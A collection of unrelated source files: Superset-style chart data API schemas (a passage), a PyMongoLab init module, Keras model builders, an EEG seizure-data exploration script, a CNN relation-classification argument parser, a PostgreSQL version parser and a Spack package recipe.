description="Should the label be at the center of the window. Default: `false`",
example=False,
)
win_type = fields.String(
description="Type of window function. See "
"[SciPy window functions](https://docs.scipy.org/doc/scipy/reference"
"/signal.windows.html#module-scipy.signal.windows) "
"for more details. Some window functions require passing "
"additional parameters to `rolling_type_options`. For instance, "
"to use `gaussian`, the parameter `std` needs to be provided.",
validate=validate.OneOf(
choices=(
"boxcar",
"triang",
"blackman",
"hamming",
"bartlett",
"parzen",
"bohman",
"blackmanharris",
"nuttall",
"barthann",
"kaiser",
"gaussian",
"general_gaussian",
"slepian",
"exponential",
)
),
)
min_periods = fields.Integer(
description="The minimum amount of periods required for a row to be included "
"in the result set.",
example=7,
)
class ChartDataSelectOptionsSchema(ChartDataPostProcessingOperationOptionsSchema):
"""
Sort operation config.
"""
columns = fields.List(
fields.String(),
description="Columns which to select from the input data, in the desired "
"order. If columns are renamed, the original column name should be "
"referenced here.",
example=["country", "gender", "age"],
)
exclude = fields.List(
fields.String(),
description="Columns to exclude from selection.",
example=["my_temp_column"],
)
rename = fields.List(
fields.Dict(),
description="columns which to rename, mapping source column to target column. "
"For instance, `{'y': 'y2'}` will rename the column `y` to `y2`.",
example=[{"age": "average_age"}],
)
class ChartDataSortOptionsSchema(ChartDataPostProcessingOperationOptionsSchema):
"""
Sort operation config.
"""
columns = fields.Dict(
description="columns by by which to sort. The key specifies the column name, "
"value specifies if sorting in ascending order.",
example={"country": True, "gender": False},
required=True,
)
aggregates = ChartDataAggregateConfigField()
class ChartDataContributionOptionsSchema(ChartDataPostProcessingOperationOptionsSchema):
"""
Contribution operation config.
"""
orientation = fields.String(
description="Should cell values be calculated across the row or column.",
required=True,
validate=validate.OneOf(
choices=[val.value for val in PostProcessingContributionOrientation]
),
example="row",
)
class ChartDataProphetOptionsSchema(ChartDataPostProcessingOperationOptionsSchema):
"""
Prophet operation config.
"""
time_grain = fields.String(
description="Time grain used to specify time period increments in prediction. "
"Supports [ISO 8601](https://en.wikipedia.org/wiki/ISO_8601#Durations) "
"durations.",
validate=validate.OneOf(
choices=[
i
for i in {**builtin_time_grains, **config["TIME_GRAIN_ADDONS"]}.keys()
if i
]
),
example="P1D",
required=True,
)
periods = fields.Integer(
descrption="Time periods (in units of `time_grain`) to predict into the future",
min=1,
example=7,
required=True,
)
confidence_interval = fields.Float(
description="Width of predicted confidence interval",
validate=[
Range(
min=0,
max=1,
min_inclusive=False,
max_inclusive=False,
error=_("`confidence_interval` must be between 0 and 1 (exclusive)"),
)
],
example=0.8,
required=True,
)
yearly_seasonality = fields.Raw(
# TODO: add correct union type once supported by Marshmallow
description="Should yearly seasonality be applied. "
"An integer value will specify Fourier order of seasonality, `None` will "
"automatically detect seasonality.",
example=False,
)
weekly_seasonality = fields.Raw(
# TODO: add correct union type once supported by Marshmallow
description="Should weekly seasonality be applied. "
"An integer value will specify Fourier order of seasonality, `None` will "
"automatically detect seasonality.",
example=False,
)
monthly_seasonality = fields.Raw(
# TODO: add correct union type once supported by Marshmallow
description="Should monthly seasonality be applied. "
"An integer value will specify Fourier order of seasonality, `None` will "
"automatically detect seasonality.",
example=False,
)
class ChartDataBoxplotOptionsSchema(ChartDataPostProcessingOperationOptionsSchema):
"""
Boxplot operation config.
"""
groupby = fields.List(
fields.String(description="Columns by which to group the query.",),
allow_none=True,
)
metrics = fields.List(
fields.Raw(),
description="Aggregate expressions. Metrics can be passed as both "
"references to datasource metrics (strings), or ad-hoc metrics"
"which are defined only within the query object. See "
"`ChartDataAdhocMetricSchema` for the structure of ad-hoc metrics.",
allow_none=True,
)
whisker_type = fields.String(
description="Whisker type. Any numpy function will work.",
validate=validate.OneOf(
choices=([val.value for val in PostProcessingBoxplotWhiskerType])
),
required=True,
example="tukey",
)
percentiles = fields.Tuple(
(
fields.Float(
description="Lower percentile",
validate=[
Range(
min=0,
max=100,
min_inclusive=False,
max_inclusive=False,
error=_(
"lower percentile must be greater than 0 and less "
"than 100. Must be lower than upper percentile."
),
),
],
),
fields.Float(
description="Upper percentile",
validate=[
Range(
min=0,
max=100,
min_inclusive=False,
max_inclusive=False,
error=_(
"upper percentile must be greater than 0 and less "
"than 100. Must be higher than lower percentile."
),
),
],
),
),
description="Upper and lower percentiles for percentile whisker type.",
example=[1, 99],
)
class ChartDataPivotOptionsSchema(ChartDataPostProcessingOperationOptionsSchema):
"""
Pivot operation config.
"""
index = (
fields.List(
fields.String(allow_none=False),
description="Columns to group by on the table index (=rows)",
minLength=1,
required=True,
),
)
columns = fields.List(
fields.String(allow_none=False),
description="Columns to group by on the table columns",
)
metric_fill_value = fields.Number(
description="Value to replace missing values with in aggregate calculations.",
)
column_fill_value = fields.String(
description="Value to replace missing pivot columns names with."
)
drop_missing_columns = fields.Boolean(
description="Do not include columns whose entries are all missing "
"(default: `true`).",
)
marginal_distributions = fields.Boolean(
description="Add totals for row/column. (default: `false`)",
)
marginal_distribution_name = fields.String(
description="Name of marginal distribution row/column. (default: `All`)",
)
aggregates = ChartDataAggregateConfigField()
class ChartDataGeohashDecodeOptionsSchema(
ChartDataPostProcessingOperationOptionsSchema
):
"""
Geohash decode operation config.
"""
geohash = fields.String(
description="Name of source column containing geohash string", required=True,
)
latitude = fields.String(
description="Name of target column for decoded latitude", required=True,
)
longitude = fields.String(
description="Name of target column for decoded longitude", required=True,
)
class ChartDataGeohashEncodeOptionsSchema(
ChartDataPostProcessingOperationOptionsSchema
):
"""
Geohash encode operation config.
"""
latitude = fields.String(
description="Name of source latitude column", required=True,
)
longitude = fields.String(
description="Name of source longitude column", required=True,
)
geohash = fields.String(
description="Name of target column for encoded geohash string", required=True,
)
class ChartDataGeodeticParseOptionsSchema(
ChartDataPostProcessingOperationOptionsSchema
):
"""
Geodetic point string parsing operation config.
"""
geodetic = fields.String(
description="Name of source column containing geodetic point strings",
required=True,
)
latitude = fields.String(
description="Name of target column for decoded latitude", required=True,
)
longitude = fields.String(
description="Name of target column for decoded longitude", required=True,
)
altitude = fields.String(
description="Name of target column for decoded altitude. If omitted, "
"altitude information in geodetic string is ignored.",
)
class ChartDataPostProcessingOperationSchema(Schema):
operation = fields.String(
description="Post processing operation type",
required=True,
validate=validate.OneOf(
choices=(
"aggregate",
"boxplot",
"contribution",
"cum",
"geodetic_parse",
"geohash_decode",
"geohash_encode",
"pivot",
"prophet",
"rolling",
"select",
"sort",
"diff",
"compare",
"resample",
)
),
example="aggregate",
)
options = fields.Dict(
description="Options specifying how to perform the operation. Please refer "
"to the respective post processing operation option schemas. "
"For example, `ChartDataPostProcessingOperationOptions` specifies "
"the required options for the pivot operation.",
example={
"groupby": ["country", "gender"],
"aggregates": {
"age_q1": {
"operator": "percentile",
"column": "age",
"options": {"q": 0.25},
},
"age_mean": {"operator": "mean", "column": "age",},
},
},
)
class ChartDataFilterSchema(Schema):
col = fields.Raw(
description="The column to filter by. Can be either a string (physical or "
"saved expression) or an object (adhoc column)",
required=True,
example="country",
)
op = fields.String( # pylint: disable=invalid-name
description="The comparison operator.",
validate=utils.OneOfCaseInsensitive(
choices=[filter_op.value for filter_op in FilterOperator]
),
required=True,
example="IN",
)
val = fields.Raw(
description="The value or values to compare against. Can be a string, "
"integer, decimal or list, depending on the operator.",
example=["China", "France", "Japan"],
)
grain = fields.String(
description="Optional time grain for temporal filters", example="PT1M",
)
isExtra = fields.Boolean(
description="Indicates if the filter has been added by a filter component as "
"opposed to being a part of the original query."
)
class ChartDataExtrasSchema(Schema):
time_range_endpoints = fields.List(EnumField(TimeRangeEndpoint, by_value=True))
relative_start = fields.String(
description="Start time for relative time deltas. "
'Default: `config["DEFAULT_RELATIVE_START_TIME"]`',
validate=validate.OneOf(choices=("today", "now")),
)
relative_end = fields.String(
description="End time for relative time deltas. "
'Default: `config["DEFAULT_RELATIVE_START_TIME"]`',
validate=validate.OneOf(choices=("today", "now")),
)
where = fields.String(
description="WHERE clause to be added to queries using AND operator.",
)
having = fields.String(
description="HAVING clause to be added to aggregate queries using "
"AND operator.",
)
having_druid = fields.List(
fields.Nested(ChartDataFilterSchema),
description="HAVING filters to be added to legacy Druid datasource queries.",
)
time_grain_sqla = fields.String(
description="To what level of granularity should the temporal column be "
"aggregated. Supports "
"[ISO 8601](https://en.wikipedia.org/wiki/ISO_8601#Durations) durations.",
validate=validate.OneOf(
choices=[
i
for i in {**builtin_time_grains, **config["TIME_GRAIN_ADDONS"]}.keys()
if i
]
),
example="P1D",
allow_none=True,
)
druid_time_origin = fields.String(
description="Starting point for time grain counting on legacy Druid "
"datasources. Used to change e.g. Monday/Sunday first-day-of-week.",
allow_none=True,
)
class AnnotationLayerSchema(Schema):
annotationType = fields.String(
description="Type of annotation layer",
validate=validate.OneOf(choices=[ann.value for ann in AnnotationType]),
)
color = fields.String(description="Layer color", allow_none=True,)
descriptionColumns = fields.List(
fields.String(),
description="Columns to use as the description. If none are provided, "
"all will be shown.",
)
hideLine = fields.Boolean(
description="Should line be hidden. Only applies to line annotations",
allow_none=True,
)
intervalEndColumn = fields.String(
description=(
"Column containing end of interval. Only applies to interval layers"
),
allow_none=True,
)
name = fields.String(description="Name of layer", required=True)
opacity = fields.String(
description="Opacity of layer",
validate=validate.OneOf(
choices=("", "opacityLow", "opacityMedium", "opacityHigh"),
),
allow_none=True,
required=False,
)
overrides = fields.Dict(
keys=fields.String(
desciption="Name of property to be overridden",
validate=validate.OneOf(
choices=("granularity", "time_grain_sqla", "time_range", "time_shift"),
),
),
values=fields.Raw(allow_none=True),
description="which properties should be overridable",
allow_none=True,
)
show = fields.Boolean(description="Should the layer be shown", required=True)
showMarkers = fields.Boolean(
description="Should markers be shown. Only applies to line annotations.",
required=True,
)
sourceType = fields.String(
description="Type of source for annotation data",
validate=validate.OneOf(choices=("", "line", "NATIVE", "table",)),
)
style = fields.String(
description="Line style. Only applies to time-series annotations",
validate=validate.OneOf(choices=("dashed", "dotted", "solid", "longDashed",)),
)
timeColumn = fields.String(
description="Column with event date or interval start date", allow_none=True,
)
titleColumn = fields.String(description="Column with title", allow_none=True,)
width = fields.Float(
description="Width of annotation line",
validate=[
Range(
min=0,
min_inclusive=True,
error=_("`width` must be greater or equal to 0"),
)
],
)
value = fields.Raw(
description="For formula annotations, this contains the formula. "
"For other types, this is the primary key of the source object.",
required=True,
)
class ChartDataDatasourceSchema(Schema):
description = "Chart datasource"
id = fields.Integer(description="Datasource id", required=True,)
type = fields.String(
description="Datasource type",
validate=validate.OneOf(choices=("druid", "table")),
)
slice_id = fields.Integer(description="Slice id", required=False,)
class ChartDataQueryObjectSchema(Schema):
class Meta: # pylint: disable=too-few-public-methods
unknown = EXCLUDE
datasource = fields.Nested(ChartDataDatasourceSchema, allow_none=True)
result_type = EnumField(ChartDataResultType, by_value=True, allow_none=True)
annotation_layers = fields.List(
fields.Nested(AnnotationLayerSchema),
description="Annotation layers to apply to chart",
allow_none=True,
)
applied_time_extras = fields.Dict(
description="A mapping of temporal extras that have been applied to the query",
allow_none=True,
example={"__time_range": "1 year ago : now"},
)
apply_fetch_values_predicate = fields.Boolean(
description="Add fetch values predicate (where clause) to query "
"if defined in datasource",
allow_none=True,
)
filters = fields.List(fields.Nested(ChartDataFilterSchema), allow_none=True)
granularity = fields.String(
description="Name of temporal column used for time filtering. For legacy Druid "
"datasources this defines the time grain.",
allow_none=True,
)
granularity_sqla = fields.String(
description="Name of temporal column used for time filtering for SQL "
"datasources. This field is deprecated, use `granularity` "
"instead.",
allow_none=True,
deprecated=True,
)
groupby = fields.List(
fields.Raw(),
description="Columns by which to group the query. "
"This field is deprecated, use `columns` instead.",
allow_none=True,
)
metrics = fields.List(
fields.Raw(),
description="Aggregate expressions. Metrics can be passed as both "
"references to datasource metrics (strings), or ad-hoc metrics"
"which are defined only within the query object. See "
"`ChartDataAdhocMetricSchema` for the structure of ad-hoc metrics.",
allow_none=True,
)
post_processing = fields.List(
fields.Nested(ChartDataPostProcessingOperationSchema, allow_none=True),
allow_none=True,
description="Post processing operations to be applied to the result set. "
"Operations are applied to the result set in sequential order.",
)
time_range = fields.String(
description="A time rage, either expressed as a colon separated string "
"`since : until` or human readable freeform. Valid formats for "
"`since` and `until` are: \n"
"- ISO 8601\n"
"- X days/years/hours/day/year/weeks\n"
"- X days/years/hours/day/year/weeks ago\n"
"- X days/years/hours/day/year/weeks from now\n"
"\n"
"Additionally, the following freeform can be used:\n"
"\n"
"- Last day\n"
"- Last week\n"
"- Last month\n"
"- Last quarter\n"
"- Last year\n"
"- No filter\n"
"- Last X seconds/minutes/hours/days/weeks/months/years\n"
"- Next X seconds/minutes/hours/days/weeks/months/years\n",
example="Last week",
allow_none=True,
)
time_shift = fields.String(
description="A human-readable date/time string. "
"Please refer to [parsdatetime](https://github.com/bear/parsedatetime) "
"documentation for details on valid values.",
allow_none=True,
)
is_timeseries = fields.Boolean(
description="Is the `query_object` a timeseries.", allow_none=True,
)
series_columns = fields.List(
fields.Raw(),
description="Columns to use when limiting series count. "
"All columns must be present in the `columns` property. "
"Requires `series_limit` and `series_limit_metric` to be set.",
allow_none=True,
)
series_limit = fields.Integer(
description="Maximum number of series. "
"Requires `series` and `series_limit_metric` to be set.",
allow_none=True,
)
series_limit_metric = fields.Raw(
description="Metric used to limit timeseries queries by. "
"Requires `series` and `series_limit` to be set.",
allow_none=True,
)
timeseries_limit = fields.Integer(
description="Maximum row count for timeseries queries. "
"This field is deprecated, use `series_limit` instead."
"Default: `0`",
allow_none=True,
)
timeseries_limit_metric = fields.Raw(
description="Metric used to limit timeseries queries by. "
"This field is deprecated, use `series_limit_metric` instead.",
allow_none=True,
)
row_limit = fields.Integer(
description='Maximum row count (0=disabled). Default: `config["ROW_LIMIT"]`',
allow_none=True,
validate=[
Range(min=0, error=_("`row_limit` must be greater than or equal to 0"))
],
)
row_offset = fields.Integer(
description="Number of rows to skip. Default: `0`",
allow_none=True,
validate=[
Range(min=0, error=_("`row_offset` must be greater than or equal to 0"))
],
)
order_desc = fields.Boolean(
description="Reverse order. Default: `false`", allow_none=True,
)
extras = fields.Nested(
ChartDataExtrasSchema,
description="Extra parameters to add to the query.",
allow_none=True,
)
columns = fields.List(
fields.Raw(),
description="Columns which to select in the query.",
allow_none=True,
)
orderby = fields.List(
fields.Tuple(
(
fields.Raw(
validate=[
Length(min=1, error=_("orderby column must be populated"))
],
allow_none=False,
),
fields.Boolean(),
)
),
description="Expects a list of lists where the first element is the column "
"name which to sort by, and the second element is a boolean.",
allow_none=True,
example=[("my_col_1", False), ("my_col_2", True)],
)
where = fields.String(
description="WHERE clause to be added to queries using AND operator."
"This field is deprecated and should be passed to `extras`.",
allow_none=True,
deprecated=True,
)
having = fields.String(
description="HAVING clause to be added to aggregate queries using "
"AND operator. This field is deprecated and should be passed "
"to `extras`.",
allow_none=True,
deprecated=True,
)
having_filters = fields.List(
fields.Nested(ChartDataFilterSchema),
description="HAVING filters to be added to legacy Druid datasource queries. "
"This field is deprecated and should be passed to `extras` "
"as `having_druid`.",
allow_none=True,
deprecated=True,
)
druid_time_origin = fields.String(
description="Starting point for time grain counting on legacy Druid "
"datasources. Used to change e.g. Monday/Sunday first-day-of-week. "
"This field is deprecated and should be passed to `extras` "
"as `druid_time_origin`.",
allow_none=True,
)
url_params = fields.Dict(
description="Optional query parameters passed to a dashboard or Explore view",
keys=fields.String(description="The query parameter"),
values=fields.String(description="The value of the query parameter"),
allow_none=True,
)
is_rowcount = fields.Boolean(
description="Should the rowcount of the actual query be returned",
allow_none=True,
)
time_offsets = fields.List(fields.String(), allow_none=True,)
class ChartDataQueryContextSchema(Schema):
datasource = fields.Nested(ChartDataDatasourceSchema)
queries = fields.List(fields.Nested(ChartDataQueryObjectSchema))
force = fields.Boolean(
description="Should the queries be forced to load from the source. "
"Default: `false`",
)
result_type = EnumField(ChartDataResultType, by_value=True)
result_format = EnumField(ChartDataResultFormat, by_value=True)
# pylint: disable=no-self-use,unused-argument
@post_load
def make_query_context(self, data: Dict[str, Any], **kwargs: Any) -> QueryContext:
query_context = QueryContext(**data)
return query_context
# pylint: enable=no-self-use,unused-argument
class AnnotationDataSchema(Schema):
columns = fields.List(
fields.String(),
description="columns available in the annotation result",
required=True,
)
records = fields.List(
fields.Dict(keys=fields.String(),),
description="records mapping the column name to it's value",
required=True,
)
class ChartDataResponseResult(Schema):
annotation_data = fields.List(
fields.Dict(
keys=fields.String(description="Annotation layer name"),
values=fields.String(),
),
description="All requested annotation data",
allow_none=True,
)
cache_key = fields.String(
description="Unique cache key for query object", required=True, allow_none=True,
)
cached_dttm = fields.String(
description="Cache timestamp", required=True, allow_none=True,
)
cache_timeout = fields.Integer(
description="Cache timeout in following order: custom timeout, datasource "
"timeout, default config timeout.",
required=True,
allow_none=True,
)
error = fields.String(description="Error", allow_none=True,)
is_cached = fields.Boolean(
description="Is the result cached", required=True, allow_none=None,
)
query = fields.String(
description="The executed query statement", required=True, allow_none=False,
)
status = fields.String(
description="Status of the query",
validate=validate.OneOf(
choices=(
"stopped",
"failed",
"pending",
"running",
"scheduled",
"success",
"timed_out",
)
),
allow_none=False,
)
stacktrace = fields.String(
desciption="Stacktrace if there was an error", allow_none=True,
)
rowcount = fields.Integer(
description="Amount of rows in result set", allow_none=False,
)
data = fields.List(fields.Dict(), description="A list with results")
applied_filters = fields.List(
fields.Dict(), description="A list with applied filters"
)
rejected_filters = fields.List(
fields.Dict(), description="A list with rejected filters"
)
class ChartDataResponseSchema(Schema):
result = fields.List(
fields.Nested(ChartDataResponseResult),
description="A list of results for each corresponding query in the request.",
)
class ChartDataAsyncResponseSchema(Schema):
channel_id = fields.String(
description="Unique session async channel ID", allow_none=False,
)
job_id = fields.String(description="Unique async job ID", allow_none=False,)
user_id = fields.String(description="Requesting user ID", allow_none=True,)
status = fields.String(description="Status value for async job", allow_none=False,)
result_url = fields.String(
description="Unique result URL for fetching async query data", allow_none=False,
)
class ChartFavStarResponseResult(Schema):
id = fields.Integer(description="The Chart id")
value = fields.Boolean(description="The FaveStar value")
class GetFavStarIdsSchema(Schema):
result = fields.List(
fields.Nested(ChartFavStarResponseResult),
description="A list of results for each corresponding chart in the request",
)
class ImportV1ChartSchema(Schema):
slice_name = fields.String(required=True)
viz_type = fields.String(required=True)
params = fields.Dict()
query_context = fields.String(allow_none=True, validate=utils.validate_json)
cache_timeout = fields.Integer(allow_none=True)
uuid = fields.UUID(required=True)
version = fields.String(required=True)
dataset_uuid = fields.UUID(required=True)
CHART_SCHEMAS = (
ChartDataQueryContextSchema,
ChartDataResponseSchema,
ChartDataAsyncResponseSchema,
# TODO: These should optimally be included in the QueryContext schema as an `anyOf`
# in ChartDataPostPricessingOperation.options, but since `anyOf` is not
# by Marshmallow<3, this is not currently possible.
ChartDataAdhocMetricSchema,
ChartDataAggregateOptionsSchema,
ChartDataContributionOptionsSchema,
ChartDataProphetOptionsSchema,
ChartDataBoxplotOptionsSchema,
ChartDataPivotOptionsSchema,
ChartDataRollingOptionsSchema,
ChartDataSelectOptionsSchema,
ChartDataSortOptionsSchema,
ChartDataGeohashDecodeOptionsSchema,
ChartDataGeohashEncodeOptionsSchema,
ChartDataGeodeticParseOptionsSchema,
ChartEntityResponseSchema,
ChartGetDatasourceResponseSchema,
ChartCacheScreenshotResponseSchema,
GetFavStarIdsSchema,
)
|
the-stack_106_14849
|
# -*- coding: utf-8 *-*
"""PyMongo_-flavored package for accessing to MongoLab databases via
`MongoLabClient`.
.. _PyMongo: http://api.mongodb.org/python/current/"""
ASCENDING = 1
"""Ascending sort order."""
DESCENDING = -1
"""Descending sort order."""
OFF = 0
"""No database profiling."""
SLOW_ONLY = 1
"""Only profile slow operations."""
ALL = 2
"""Profile all operations."""
version_tuple = (1, 2, '+')
def get_version_string():
if isinstance(version_tuple[-1], basestring):
return '.'.join(map(str, version_tuple[:-1])) + version_tuple[-1]
return '.'.join(map(str, version_tuple))
version = get_version_string()
from pymongolab.connection import Connection
from pymongolab.mongo_client import MongoClient
|
the-stack_106_14853
|
import keras
from keras.layers import Dense, Dropout, BatchNormalization
from keras.models import Sequential
import pandas as pd
import numpy as np
def shallow_model():
input_layer = 5
output_layer = 2
h_layer1 = 8
dropout1 = 0.25
h_layer2 = 8
dropout2 = 0.5
model = Sequential()
model.add(Dense(h_layer1, activation='relu', input_shape=(input_layer, )))
model.add(BatchNormalization())
model.add(Dropout(dropout1))
model.add(Dense(h_layer2, activation='relu'))
model.add(BatchNormalization())
model.add(Dropout(dropout2))
model.add(Dense(output_layer, activation='softmax'))
return model
def bow_model():
input_layer = 262
output_layer = 2
h_layer1 = 512
dropout1 = 0.25
h_layer2 = 256
dropout2 = 0.5
h_layer3 = 128
dropout3 = 0.5
model = Sequential()
model.add(Dense(h_layer1, activation='relu', input_shape=(input_layer, )))
model.add(BatchNormalization())
model.add(Dropout(dropout1))
model.add(Dense(h_layer2, activation='relu'))
model.add(BatchNormalization())
model.add(Dropout(dropout2))
model.add(Dense(h_layer3, activation='relu', ))
model.add(BatchNormalization())
model.add(Dense(output_layer, activation='softmax'))
return model
|
the-stack_106_14854
|
# -*- coding: utf-8 -*-
"""
Created on Thu Sep 3 14:49:20 2020
@author: The Jipsess
"""
# The data used here is EEG data. Originally there were 500 participants, who
# were recorded for 23.5 seconds with 4097 data points per sample. Each sample
# was divided into 23 chunks , each containing 178 data points for 1 second.
# These chunks were shuffled, resulting in 11500 samples.
#
#
# 5 - (healthy, surface recording) eyes open, means when they were recording the EEG signal of the brain the patient had their eyes open
# 4 - (healthy, surface recording) eyes closed, means when they were recording the EEG signal the patient had their eyes closed
# 3 - (epiliptic, intracranial recording) The EEG activity from the hippocampal formation in the non-epiletogenic hemisphere with no seizure
# 2 - (healthy, surface recording) The EEG activity from the epileptogenic zone brain area with no seizure
# 1 - (healthy, surface recording) Recording of seizure activity
import os
import numpy as np
import pandas as pd
from sklearn import preprocessing as pp
from sklearn.covariance import EllipticEnvelope as mcd
from sklearn.decomposition import PCA
from matplotlib import pyplot as plt
os.chdir("D:/OneDrive/school/1. Master/11. Scientific Programming/Github/Seizure_Recognition")
x = pd.read_csv("Data/data.csv", sep = ";")
# %% Data inspection
# Count number of missing values
nullsum = np.sum(np.sum(x.isnull()))
# %% Data Cleaning
# Set variable names colummn as index
x.set_index('Unnamed: 0', inplace = True)
# == Missing Data ==
# Remove all samples with any missing data
x.dropna(inplace = True)
# == Noise Removal ==
# == Outlier Detection ==
cov = mcd(support_fraction = 0.6, random_state = 0).fit(x)
outliers = cov.predict(x)
num_outliers = np.unique(outliers, return_counts=True)
# %% PCA
scaled_x = pp.scale(x.iloc[:,0:-1])
pca = PCA()
pca.fit(scaled_x)
pca_x = pca.transform(scaled_x)
plt.figure()
colors = ['navy', 'turquoise', 'darkorange']
lw = 2
plt.scatter(pca_x[:,0], pca_x[:,1])
# %% Data Transformation
# Data Normilisation
y = pp.normalize(x)
# %% Visualisation
# Let's inspect the distribution of the data
plt.hist(x['X1'], bins = 200, histtype = 'barstacked')
plt.show()
fig, axes = plt.figure()
plt.hist(x.iloc[:,1:3], 20, histtype='step', stacked=True, fill=False)
plt.hist(x['X1'], 100, alpha = 0.5, label='a')
plt.hist(x['X2'], 100, alpha = 0.5, label='b')
plt.legend(loc='upper left')
plt.show()
for col in x.columns[1:-1]:
plt.hist(x[col], 100, alpha = 0.5)
plt.show()
# Visualise noise
plt.figure(dpi = 300)
for i in range(80,82):
plt.plot(x.iloc[i,1:-1], alpha = 0.75, linewidth=0.2)
plt.show()
plt.figure(dpi = 300)
plt.plot(x.iloc[105,1:-1], marker ='x', markersize=3)
plt.show()
|
the-stack_106_14857
|
import argparse
import sys
def parse_args():
"""
Parse input arguments
"""
parser = argparse.ArgumentParser()
# Data loading params
# parser.add_argument("--train_path", default="SemEval2010_task8_all_data/SemEval2010_task8_training/TRAIN_FILE.TXT",
# type=str, help="Path of train data")
# parser.add_argument("--test_path", default="SemEval2010_task8_all_data/SemEval2010_task8_testing_keys/TEST_FILE_FULL.TXT",
# type=str, help="Path of test data")
parser.add_argument("--train_path", default="myData/train.txt",
type=str, help="Path of train data")
parser.add_argument("--test_path",
default="myData/test.txt",
type=str, help="Path of test data")
parser.add_argument("--max_sentence_length", default=202,
type=int, help="Max sentence length in data")
parser.add_argument("--dev_sample_percentage", default=0.1,
type=float, help="Percentage of the training data to use for validation")
parser.add_argument("--relation_file", default="myData/relation2id.txt",
type=str, help="Path of relation file")
# Model Hyper-parameters
# Embeddings
parser.add_argument("--embedding_path", default=None,
type=str, help="Path of pre-trained word embeddings (word2vec)")
parser.add_argument("--text_embedding_dim", default=100,
type=int, help="Dimensionality of word embedding (default: 300)")
parser.add_argument("--pos_embedding_dim", default=50,
type=int, help="Dimensionality of relative position embedding (default: 50)")
# CNN
parser.add_argument("--filter_sizes", default="2,3,4,5",
type=str, help="Comma-separated filter sizes (Default: 2,3,4,5)")
parser.add_argument("--num_filters", default=128,
type=int, help="Number of filters per filter size (Default: 128)")
# Misc
parser.add_argument("--desc", default="",
type=str, help="Description for model")
parser.add_argument("--dropout_keep_prob", default=0.5,
type=float, help="Dropout keep probability of output layer (default: 0.5)")
parser.add_argument("--l2_reg_lambda", default=1e-5,
type=float, help="L2 regularization lambda (default: 1e-5)")
# Training parameters
parser.add_argument("--batch_size", default=20,
type=int, help="Batch Size (default: 20)")
parser.add_argument("--num_epochs", default=100,
type=int, help="Number of training epochs (Default: 100)")
parser.add_argument("--display_every", default=10,
type=int, help="Number of iterations to display training information")
parser.add_argument("--evaluate_every", default=100,
type=int, help="Evaluate model on dev set after this many steps (default: 100)")
parser.add_argument("--num_checkpoints", default=5,
type=int, help="Number of checkpoints to store (default: 5)")
parser.add_argument("--learning_rate", default=1.0,
type=float, help="Which learning rate to start with (Default: 1.0)")
parser.add_argument("--decay_rate", default=0.9,
type=float, help="Decay rate for learning rate (Default: 0.9)")
# Testing parameters
parser.add_argument("--checkpoint_dir", default="runs/1565578114/checkpoints",
type=str, help="Checkpoint directory from training run")
# Misc Parameters
parser.add_argument("--allow_soft_placement", default=True,
type=bool, help="Allow device soft device placement")
parser.add_argument("--log_device_placement", default=False,
type=bool, help="Log placement of ops on devices")
parser.add_argument("--gpu_allow_growth", default=True,
type=bool, help="Allow gpu memory growth")
# Log
parser.add_argument("--train_log_file", default="train.log", type=str, help="name for train log")
parser.add_argument("--test_log_file", default="test.log", type=str, help="name for test log")
if len(sys.argv) == 0:
parser.print_help()
sys.exit(1)
print("")
args = parser.parse_args()
for arg in vars(args):
print("{}={}".format(arg.upper(), getattr(args, arg)))
print("")
return args
FLAGS = parse_args()
|
the-stack_106_14858
|
##
# .versionstring
##
"""
PostgreSQL version string parsing.
>>> postgresql.versionstring.split('8.0.1')
(8, 0, 1, None, None)
"""
def split(vstr: str) -> tuple:
"""
Split a PostgreSQL version string into a tuple.
(major, minor, patch, ..., state_class, state_level)
"""
v = vstr.strip().split('.')
# Get rid of the numbers around the state_class (beta,a,dev,alpha, etc)
state_class = v[-1].strip('0123456789')
if state_class:
last_version, state_level = v[-1].split(state_class)
if not state_level:
state_level = None
else:
state_level = int(state_level)
vlist = [int(x or '0') for x in v[:-1]]
if last_version:
vlist.append(int(last_version))
vlist += [None] * (3 - len(vlist))
vlist += [state_class, state_level]
else:
state_level = None
state_class = None
vlist = [int(x or '0') for x in v]
# pad the difference with `None` objects, and +2 for the state_*.
vlist += [None] * ((3 - len(vlist)) + 2)
return tuple(vlist)
def unsplit(vtup: tuple) -> str:
"""
Join a version tuple back into the original version string.
"""
svtup = [str(x) for x in vtup[:-2] if x is not None]
state_class, state_level = vtup[-2:]
return '.'.join(svtup) + ('' if state_class is None else state_class + str(state_level))
def normalize(split_version: tuple) -> tuple:
"""
Given a tuple produced by `split`, normalize the `None` objects into int(0)
or 'final' if it's the ``state_class``.
"""
(*head, state_class, state_level) = split_version
mmp = [x if x is not None else 0 for x in head]
return tuple(mmp + [state_class or 'final', state_level or 0])
default_state_class_priority = [
'dev',
'a',
'alpha',
'b',
'beta',
'rc',
'final',
None,
]
python = repr
def xml(self):
return '<version type="one">\n' + \
' <major>' + str(self[0]) + '</major>\n' + \
' <minor>' + str(self[1]) + '</minor>\n' + \
' <patch>' + str(self[2]) + '</patch>\n' + \
' <state>' + str(self[-2]) + '</state>\n' + \
' <level>' + str(self[-1]) + '</level>\n' + \
'</version>'
def sh(self):
return """PG_VERSION_MAJOR=%s
PG_VERSION_MINOR=%s
PG_VERSION_PATCH=%s
PG_VERSION_STATE=%s
PG_VERSION_LEVEL=%s""" %(
str(self[0]),
str(self[1]),
str(self[2]),
str(self[-2]),
str(self[-1]),
)
if __name__ == '__main__':
import sys
import os
from optparse import OptionParser
op = OptionParser()
op.add_option('-f', '--format',
type='choice',
dest='format',
help='format of output information',
choices=('sh', 'xml', 'python'),
default='sh',
)
op.add_option('-n', '--normalize',
action='store_true',
dest='normalize',
help='replace missing values with defaults',
default=False,
)
op.set_usage(op.get_usage().strip() + ' "version to parse"')
co, ca = op.parse_args()
if len(ca) != 1:
op.error('requires exactly one argument, the version')
else:
v = split(ca[0])
if co.normalize:
v = normalize(v)
sys.stdout.write(getattr(sys.modules[__name__], co.format)(v))
sys.stdout.write(os.linesep)
|
the-stack_106_14860
|
# Copyright 2013-2021 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
from spack import *
class Libxdamage(AutotoolsPackage, XorgPackage):
"""This package contains the library for the X Damage extension."""
homepage = "https://cgit.freedesktop.org/xorg/lib/libXdamage"
xorg_mirror_path = "lib/libXdamage-1.1.4.tar.gz"
version('1.1.4', sha256='4bb3e9d917f5f593df2277d452926ee6ad96de7b7cd1017cbcf4579fe5d3442b')
depends_on('libxfixes')
depends_on('libx11')
